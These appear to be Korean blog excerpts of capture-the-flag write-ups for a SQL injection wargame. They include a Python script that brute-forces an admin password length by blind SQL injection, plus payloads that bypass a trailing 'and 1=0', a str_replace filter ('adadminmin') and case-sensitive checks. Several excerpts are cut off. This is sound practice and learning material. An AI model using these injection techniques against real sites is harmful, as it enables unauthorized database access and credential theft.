import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD' || id like 'admin' %26%26 length(pw) like " + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=..
간이 밍밍한 문제이다. 꽤나 심심한 문제다. query문 제일 뒷쪽에 and 1=0 이라는 거짓값이 존재한다. 그냥 or 를 이중으로 써서 뒤에 있는 and 연산을 무력화시키면 된다. ?pw=ABCD' or id='admin' or '1'='1
php 코드를 보면, 이전 문제에서 id 검색에서는 대소문자를 구별하지 않는다는 점을 이용하여 exploit 했었다. 이번에는 strtolower 라는 함수로 GET 방식으로 전달받은 id 문자열을 모두 소문자로 바꾸어준다. 또한 str_replace() 함수로 admin 이라는 문자열을 공백으로 replace 한다. 그렇다면 어떻게 해야할까. admin이라는 문자열을 공백으로 비운다고 하니, admin 이라는 문자열 안에 admin 이라는 문자열을 희생양으로 바치면 된다. 즉, adadminmin 과 같은 식으로 id 에 전달해준다면 결과적으로는, ad""min -> admin 이 되어 가운데에 있던 admin이 공백으로 바뀌고 앞뒤 문자열이 합쳐져 다시금 admin 이라는 문자열이 생성될 것이다. a..
MySQL에서 테이블을 생성할 때 id 를 단순하게 'varchar' 로 선언했다면 id를 검색할 적에 대소문자를 구별하지 않는다. 이를 이용하여 문자열 필터링을 우회할 수 있다. Tastes good.
